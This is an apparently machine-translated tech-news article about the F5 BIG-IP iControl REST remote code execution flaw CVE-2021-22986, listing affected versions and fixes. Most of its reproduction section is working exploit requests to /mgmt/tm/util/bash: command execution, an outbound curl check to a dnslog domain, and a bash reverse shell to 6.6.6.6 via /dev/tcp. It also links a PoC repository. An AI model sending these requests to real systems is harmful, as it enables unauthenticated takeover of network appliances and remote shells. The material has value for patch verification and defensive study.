Shulou(Shulou.com)05/31 Report--

F5 BIG-IP remote code execution vulnerability CVE-2021-22986 analysis is what, for this problem, this article details the corresponding analysis and solutions, hoping to help more want to solve this problem of small partners to find a simpler way.

0x00 Vulnerability Description

F5 BIG-IP is an application delivery platform of F5 company, which integrates network traffic management, application security management, Load Balancer and other functions.

On March 10,2021, F5 officially issued a security notice. The security update contained several high-risk vulnerabilities affecting F5's BIG-IP and BIG-IQ devices. The vulnerability numbers were CVE-2021-22986, CVE-2021-22987, CVE-2021-22988, CVE-2021 -22989, CVE-2021 - 22990, CVE-2021 - 22991, CVE-2021-22992 respectively; CVE-2021-22986 is an unauthorized remote code execution vulnerability in the iControl REST interface of F5 BIG-IP/IQ devices with a vulnerability score of 9.8 and a critical rating. F5 security bulletin updates multiple critical vulnerabilities in BIG-IP, BIG-IQ. It is recommended that the majority of users upgrade f5 big-iq,f5 big-ip to the latest version in time to avoid attacks.

0x01 Impact Version

BIG-IP 16.0.0-16.0.1

BIG-IP 15.1.0-15.1.2

BIG-IP 14.1.0-14.1.3.1

BIG-IP 13.1.0-13.1.3.5

BIG-IP 12.1.0-12.1.5.2

BIG-IQ 7.1.0-7.1.0.2

BIG-IQ 7.0.0-7.0.0.1

BIG-IQ 6.0.0-6.1.0

0x02 Bug recurrence

Deployment Installation F5 BIG-IPV Vulnerability Test Range Environment.

1. Access vulnerability environment

2. POC verification, command execution operation

1. system command execution

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 41

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

2. Detect whether it is possible to leave the network through dnslog

Generated domain name: zg8ie5.dnlog.cn

out-of-net detection

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 62

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}

Found out you can go out.

3. Bounce shell to vps via bash

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 83

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}

vulnerability verification python script

https://github.com/PeiQi0/PeiQi-WIKI-POC

0x03 Repair suggestions

upgrade to the latest version

About F5 BIG-IP remote code execution vulnerability CVE-2021-22986 analysis is what kind of problem answer to share here, hope the above content can have some help to everyone, if you still have a lot of doubts not solved, you can pay attention to the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.